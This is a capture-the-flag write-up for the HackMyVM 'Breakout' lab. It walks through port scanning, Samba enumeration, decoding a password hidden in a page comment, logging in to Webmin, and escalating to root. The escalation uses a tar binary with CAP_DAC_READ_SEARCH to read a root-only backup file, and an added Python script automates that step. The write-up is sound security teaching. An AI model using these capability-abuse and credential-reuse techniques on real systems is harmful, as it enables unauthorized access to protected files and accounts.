Breakout Write-Up
Introduction
In this write-up, I will guide you through the steps I took to complete the HackMyVM - Breakout CTF challenge. The objective is to gain root access to the target machine by exploiting the vulnerabilities we identify along the way. Check out the video here.
TL;DR
Reconnaissance
Network/Port Scanning (Nmap)
Command: nmap -sV -sC -oA breakout 172.16.101.74
Explanation:
nmap: Tool used to scan the network and ports to discover which services are running.
-sV: Perform version detection of the discovered services.
-sC: Run the default NSE scripts against each service.
-oA breakout: Write output in all three formats (normal, grepable and XML) using the base filename "breakout".
172.16.101.74: IP address of the Breakout VM on my network.
Output:

Findings: There is a web server on port 80, a Samba server, and two more HTTP services on ports 10000 and 20000.
Let's check out the web server, and in the background run gobuster and enum4linux to brute-force web directories and to enumerate the Samba server respectively.
Directory Brute-forcing (Gobuster)
Command: gobuster dir -u http://172.16.101.74 -w /SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Note: I have set up an alias to run gobuster inside a Docker container. The alias mounts my local SecLists checkout at /SecLists inside the container, which is why the word list path below starts with /SecLists.
Alias: alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'
Explanation:
dir: Mode of operation, directory/file enumeration.
-u http://172.16.101.74: Base URL of the target web server to scan.
-w /SecLists/Discovery/Web-Content/directory-list-2.3-big.txt: Path of the word list to use (as seen from inside the container).
Output:

Findings:
Nothing interesting was found.
Enumerating Samba Server (enum4linux)
Command: enum4linux -a 172.16.101.74
Explanation:
-a: Do all simple enumeration (equivalent to -U -S -G -P -r -o -n -i): users, shares, groups, password policy, RID cycling, OS information, nmblookup and getting printer info.
172.16.101.74: IP of the target Samba server to enumerate.
Output:

Findings:
A user named cyber was found. We do not have a password yet, so we keep the username for later.
Visiting Web Page (Port 80)

This is the default Apache landing page. Let's check the page source in case there is some extra information there: open it with the shortcut Ctrl + U.
Here we find a comment at the bottom:

This looks like an encoded message. We can use dcode.fr's cipher identifier to figure out what it is.
The site identifies it as Brainfuck. Strictly speaking, Brainfuck is not an encoding but a tiny programming language: the comment is a program made up of the eight Brainfuck instructions (+ - < > . , [ ]), and running it prints the hidden text.
Running the comment through a Brainfuck interpreter (the Brainfuck Decoder on dcode.fr) gives the following output:
This looks like a password, so we can try it wherever a login is required.
Visiting Web Page (Port 20000)
On visiting http://172.16.101.74:20000 the web page tells us the server only speaks HTTPS and points us to https://172.16.101.74:20000.

Click the link to visit the HTTPS page (accept the self-signed certificate warning if your browser shows one).
We get a Webmin login page.

User (cyber) Access
We can try the username cyber found through Samba enumeration together with the password .2uqPEfj3D<P'a-3 printed by the Brainfuck program.
The credentials work and we get a menu on the left.

At the bottom of the menu there is an icon that opens a command shell in the browser, running as the cyber user.

We can read the user flag from the user.txt file in the home directory by running the command:
Privilege Escalation

Listing the files and their permissions in the current directory (/home/cyber) shows a copy of the tar executable that is owned by root. It is not a SUID binary, so it does not run as root; what makes it interesting is a file capability.
Checking the binary's capabilities with getcap shows that this tar carries CAP_DAC_READ_SEARCH, which lets a process bypass file read and directory search permission checks. In other words, this tar can read any file on the system regardless of its owner or mode, even though it runs as cyber.

ChatGPT explanation:

Looking through the file system for something worth reading with this tar, we find a hidden file at /var/backups/.old_pass.bak.

The permissions show that the file is owned by root and only root has read and write access, so cat fails as cyber.
We can use the tar executable from the home directory to get at its contents: the capability lets tar read the file into an archive, and when we extract that archive the extracted copy is created as cyber, who can then read it normally.
We start by creating the archive. Command:

Then we extract it.
Command:

Let's check the permissions on the extracted file. Command:

We see that the extracted file is owned by the user cyber, with read and write permission for the owner.
Reading the extracted file. Command:

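The archive-then-extract sequence above, wrapped up as an added example (not code from the original write-up). On the box you would call read_via_tar("/home/cyber/tar", "/var/backups/.old_pass.bak"); to stay runnable anywhere, demo() uses the system tar on a constructed temporary file with assumed contents, which exercises exactly the same two tar invocations.

```python
"""Added example, not from the original write-up: reading a root-only file through
a tar binary that carries CAP_DAC_READ_SEARCH.

The privileged tar reads the file into an archive; extracting that archive as the
unprivileged user produces a copy owned by that user. demo() stands in for the
real target with a constructed temp file (assumed path and content) and the
system tar, so it runs without the capability-bearing binary.
"""
import os
import subprocess
import tempfile


def read_via_tar(tarbin: str, src: str) -> str:
    """Archive src with tarbin, extract it into a scratch dir, and return its text."""
    with tempfile.TemporaryDirectory() as work:
        archive = os.path.join(work, "out.tar")
        # tar strips the leading '/' from member names, so archive relative to / and
        # extract relative to the scratch dir; the member path is then predictable.
        rel = os.path.relpath(src, "/")
        subprocess.run(
            [tarbin, "-cf", archive, "-C", "/", rel],
            check=True,
            stderr=subprocess.DEVNULL,  # silence "Removing leading '/'" noise
        )
        subprocess.run([tarbin, "-xf", archive, "-C", work], check=True)
        with open(os.path.join(work, rel), encoding="utf-8", errors="replace") as fh:
            return fh.read().rstrip("\n")


def demo() -> str:
    """Run the sequence on a constructed file so the example works on any machine."""
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".bak") as fh:
        fh.write("constructed-secret\n")  # stands in for /var/backups/.old_pass.bak
        path = fh.name
    try:
        return read_via_tar("tar", path)  # on Breakout: "/home/cyber/tar"
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

Note that check=True is what surfaces the failure mode: with a tar that lacks the capability, the create step exits non-zero on a root-only file and the function raises instead of returning an empty string.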
This looks like another password, presumably an old root password, so we can try it for the root user.
Try the username root with the password Ts&4&YurgtRX(=~h on the Webmin authentication portal at https://172.16.101.74:20000/
The credentials work and we are logged in as root, so the same shell icon now gives us a root shell.

And finally, we can read the root flag: